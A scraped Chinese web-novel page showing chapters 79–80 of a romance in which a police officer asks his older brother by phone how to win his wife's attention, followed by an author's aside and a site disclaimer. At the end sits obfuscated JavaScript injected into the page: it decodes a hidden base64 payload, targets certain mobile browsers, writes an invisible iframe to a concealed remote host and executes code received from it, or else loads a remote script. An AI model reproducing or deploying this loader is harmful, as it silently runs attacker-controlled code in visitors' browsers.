但这样的感觉,真的很不好。

苏梦瑶一直站在原地,盯着周子墨刚刚消失的方向。

他的背影,一直是那么的笔挺,像是战斗胜利的公**。

但不知道为什么,苏梦瑶还是从他的背影中读到了一种叫做失落的东西……

在苏梦瑶的印象中,周子墨应该都是高高在上的,不受任何人的侵犯的。而不是像现在这样,看起来如此的失落……

转身,她将视线落在炉子上的炒丝上面。

她的腰身上,还残留着周先生的温度。炉子里,不时发出“滋滋滋”的声响。这样的声音,这样的场景,本应该让她觉得温暖至极才对,可不知道为什么,她的背脊却是那么冷……

冷的,不管她怎么紧抱住自己的胳膊都无法感受到温暖。

将全部的菜肴弄好,端上桌的时候,周子墨已经等候在桌子的另一端。

接过周太太递过来的饭,周先生便开始埋头扒饭。

他吃饭的时候,很安静。

一看,就是出自于大家庭。

除了前额上几缕落下来的刘海挡住了他的双眸之外,其他的都和往日一样。

可周先生越是表现的如此平静,周太太便越是毛躁。

第七十九章 求援助威

周先生刚刚不是很生气的吗?

为什么在那样短暂的质问之后,便离开了。而现在还一如往常,和她坐在同一张饭桌上,用着餐?

难道,他真的不介意自己买东西给别的男人?

带着这样的懊恼,周太太也跟着一起来到了餐桌前。

餐桌上,有着周先生最爱吃的丝,也有着周太太喜欢的鱼汤。

可面对可口的菜肴,两个人都心不在焉。

周先生吃的很快,没有一下子他便饱了,然后站了起来,道:“我吃饱了!”

“丝不是还有很多吗?”看着桌子上的那些菜,周太太又是不确定的看向周先生。

寻常,只要桌子上的丝没有吃完,周先生是绝对不会先离开餐桌的。

可今天……

“我吃的很饱了,先去洗澡!”

说着,周先生又是无奈的转身,钻进了卧室内。

“生气了吧?”

看着周先生离去的背影,周太太有些迷惘的看着他的身影。

要是换成以前,周先生就算几天几夜都不回家,或是一个人关在卧室里,周太太都会觉得没有什么。但不知道什么时候开始,她开始越来越注意周先生的感受了。

上一次他离家出走的时候,她半夜打电话给他,是卡恩接的,周太太就难过了好一阵。而现在,周先生的对她的影响似乎越来越明显了。

单单是一盘吃不完的炒丝,就能让她有些坐立不安……

而回到房间的周先生,虽然和周太太说自己是准确去洗澡。可进门的第一时间,周先生便打电话给远在美国的大哥周子放。

“喂,大哥?”

周子墨边拿着电话,走进了浴室里。当然,他的声音也是刻意压低着,为的是不让客厅里吃着饭的周太太察觉到自己此刻正在做些什么事情。

“喂,老三这么大早找我有什么事情?”

看到周先生的来电的时候,周子放那边天才灰蒙蒙亮。

对于设计师的他,晚上的灵感是最为雀跃的时候。一整个晚上的赶工,到了快五点的时候才入睡的。没睡一会儿,电话就响了。本来是打算直接按掉之后,继续睡个昏天地暗的。可当看到手机屏幕上“老三”二字的时候,周子放的嘴角突然扬起了一抹诡异的笑容……

以前,周子墨是最少联系自己的那一个,通常都是自己先打电话问他需不需要什么新衣服之类的时候才会听到他的声音。然而自从周子墨结婚之后,因为想要引得妻子注意的缘故,这个男人时常打电话给自己。那急躁的子,就像是一个初恋的小伙子。

以前,周子放都会尽全力帮助他。甚至还寄给他一大堆的衣服,配饰之类的,好让他真的引起他弟妹的关注。但这次……

谁叫他周子墨大清早的扰人清梦?

他要是不给周子墨一个教训,那以后他的睡眠时间还了得?

“喂,大哥。我有点事情,想要请教你。”周子墨中规中矩的开场白,让电话另一端的周子放差一点笑出声。

这个老三,或许是因为职业的缘故,最心高气傲。说话,当然也很少有靠谱的时候。

但这一次……

看来,被情所困的男人果然不一样。

连原本那吊儿郎当的格,都能为此而改变。

“有什么事情,你直接说吧。能帮上忙的,我尽力!”靠在柔软的大床上,周子放嘴角上的那抹邪恶笑容是越发的灿烂。

其实,周子放心里更想说的是:“你墨老三能有什么能让你这么严肃的事情,无非就是如何惹得你的新欢小妻子苏梦瑶的注意罢了。”

当然,如此损人的话周子放没有直接说出来,不然他脑海中的某项计划可就实施不了了。

“是这样的。还是和前几天一样的问题,我到底要怎么做,才能让周太太将注意力多一点放在我的身上……”

周先生的声音,依旧清越。通过无线电波,传送到大洋彼岸的另一端的周子放的耳里的时候,也是那么的动人。

但如此的声音,加上此刻他说的话,真的有些不伦不类。

在听着周子墨说这一番话的时候,周子放的心里其实已经将他狠狠的唾弃了不知道几百遍了。

一个大老爷们儿,说出这样的话,也不嫌丢人!

当然,如此的一番话,周子放以及只是在心里念叨着。

“上次你不是才跟我说过,我送到墨镜起到了一点效果吗?”

听着周子墨的话,周子放翻了一个白眼。之后,他才开口问着。

他可没有忘记,上一次周子墨给自己打电话的激动语气。

那个时候,美国时间还是午夜三点,正是他工作进行到白日化的阶段,也是他的灵感最为敏锐的阶段。但周子墨的一通电话,就将他的这一切都给结束了。

周子放原以为周子墨有说什么急事和自己说。哪知道,周子墨一开口就是他今天终于引得他的老婆的关注了。原因,自然是他周子放上一次为他准备好的那些东西。

但也是那一天,周子放第一次听到自己弟弟发自于真心的笑声。

其实,周家的三个孩子都算是比较老成的。因为他们背景的缘故,什么话该说,什么时候该笑,都是有必要讲究的。这也造成了,他们寻常看起来笑容很多,但真正的笑容却不多见的原因。

而他们这三个孩子中,将自己的本掩藏的最深的,就是周子墨了。寻常待人看起来比较温和,却也疏离,就连领导都看不出这个男人真正的底线到底在哪里。

但自从听到了周子墨因为周太太而展露的爽朗笑声之后,周子放便懂了他的底线在哪里了。

“上次是起了一点效果。”在周子放的面前,他虽然很不想承认这是周子放的功劳,可没有办法,这是事实。

也就是因为周子放送给自己的那一副太阳眼镜,他戴着之后,周太太真的一直偷偷的在打量着他。可那效果只是暂时,也是局限的。总不能让他也在这么个大晚上,带三个太阳眼镜在家里到处晃。那样,非但没有让周太太的注意力全部落到他的身上,反而会让她认为他的脑子有问题,将他好不容易在她面前建立的形象毁于一旦。

而今晚,那件桃红色要送给另一个男人的衬衣,更是引来了他无尽的忧虑。

------题外话------

老实说,这两天卡文了。

不过后续已经写出来了,还希望亲们别不要俺了。

俺最近身体不是很好,这时候卡文,卡的比较严重。

至于亲们提出的意见,俺已经接收到了—_—。sorry!

第八十章 你是个人

但很明显,此刻周子墨的忧愁电话另一端的周子放并没有感觉到。他听着他的话,又是一阵调傥:“那你就再戴着,让她看到不就无法忽略你的存在了吗?”

“难道你要我大晚上顶着个太阳镜在她面前晃悠?那她还不以为我是个神经病?”

听到周子放的建议,周子墨的气不打一处发。

听着周子墨暴躁,周子放又翻了一个白眼。内心则嘀咕着,你都知道你现在那边是大晚上,我这边才清晨你就来骚扰我?

“快帮我想下,到底该怎么办才好?”

见电话另一端没有了声响,周子墨又开始催促道。

“怎么办才好呢……”电话那一段,周子放拉长了声调,像是正在思考着什么。但因为是电话的缘故,周子墨本就无法看到周子放嘴角上那抹奸计得逞的笑容。

“你的小妻子算是比较顽固的,再加上你说过,她现在是一个都市白领,品味什么的各方面可能都比较高。要引得她的注意,这确实是个比较棘手的问题。”

“棘手?你是不是办不到?”听着周子放话语里的声调,周子墨狐疑问道。

“我可没有说,我办不到!”

果然不愧是周子墨,一听到他刚刚的语调就差一点识破了他的伎俩。好在,他周子放也不是吃素的。在察觉到周子墨有可能意识到什么的时候,他一下子便改变了语调。从刚刚的迟疑着,变成现在的非常肯定。

只是,在说着这番话的时候,此刻正靠在床褥上的周子放,唇角上又是一抹邪恶的弧度。

墨老三啊,怪只怪你三番两次扰乱了我的工作和生活。

要不给你一点小颜色看看,我就不是周子放!

当然,这点颜色自然不是出自他周子放的手。正所谓,本是同生相煎何太急。

他要的,是借他弟妹的手,来整一整周子墨。

至于今后该怎么面对周子墨,周子放一点也都不担心。

因为眼下的情况他都看清楚了,虽然周子墨是腹黑了一点,但他已经被他的小妻子吃的死死的。只要周太太一句话,周先生大概连屁都不敢放了。

所以,他回国之后最必要的,就是要先和自己的弟妹拉好关系才行……

对于这一点,周子放在几个月之前就已经开始列出一个详细的列表,他才不怕周太太会觉得他不是一个好大伯!

“那你说,我该怎么做才好?”听到周子放说他有办法对付周太太,周子墨一下子来了神。

这一瞬,周子墨的情绪顿时好了几分,握着手机的大掌也加重了几分力道,像是急切的期待着什么。

而此刻的周先生,则是站在浴室里。

面朝着他的,还有那面巨幅的镜子。

当自己如此期待的等着周子放的时候,他自然也注意到镜子里面的那个自己。

那是,自己从未见到过的表情。

焦虑,担忧,又是欣喜若狂……

这样的神态,真的像极了十七八岁初尝禁果的小伙子。

他周子墨不是没有恋爱过,但却是第一次展露如此神情,向来自己对周太太的感情,已经不仅仅可以用“喜欢”二字来形容了。

“你的小妻子现在可是都市白领,品味素质什么的,一般比你这个人要来的高。”听着周子墨充满期待的嗓音,电话另一端的周子放的嘴角上又是一个邪恶的弧度绽放。灰蒙蒙的天色中,如此的笑容就像是悄然绽放在清晨的玫瑰,沾上了露水,等待人的采摘。有着,如同罂粟一般,让人欲罢不能的魔力。

很好,周子墨现在已经上钩了……

平时的时候,他断然不敢如此奚落周子墨。

这个弟弟有着过人的智商的同时,也是一个极品腹黑男。你不要去招惹他,就可以相安无事的过日子。但你要是一旦招惹了他,让他感到一点不痛快的话,那他绝对有法子能将你整的生不如死,而且前提是你本一点都看不出是他在整你的迹象。

鉴于以往那些不快的经历,周子放已经很少如此大胆的奚落周子墨了,但今天,这是个难得的机会。

量周子墨,也不敢和他唱什么反调。

果然他的这番话落下之后,电话另一端的周子墨的气息虽然不稳,但最终没有出口反驳什么。

“人”,其实他非常介意别人用这个词来形容自己。

他周子墨虽然不是什么文绉绉的文人,但好歹也是一届英俊潇洒的警官。有多少女人在他面前前仆后继,有多少人为他神魂颠倒?

想着,周子墨还不忘朝着自己面前的镜子摆出一个类似于T台型男的姿势。越看下去,他还真的觉得自己越是帅气,比那些型男还要俊俏上几分。

可是光长着这么一张脸,没有得到周太太的赏识又有什么意义?

没有得到周太太喜欢的日子,是晦暗的;

没有讨得周太太欢心的日子,是不开心的;

没有得到周太太给的礼物的日子,是绝望的……

想着,周先生原本挺直的腰杆又开始颓废下阵。

虽然很想反驳周子放,你丫的奚落我不就是因为我的脸长的比你好看,身材比你要完美,得到女人的青睐也比你多吗?但一想到上一次也是因为周子放的关系,周太太才将视线多一点落到自己的身上,原本膨胀的怒焰也迅速的萎靡下来。

不管什么方法,只要能让他周子墨得到周太太的关注就好了。就算要他刻意讨好周子放,他也忍了……
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}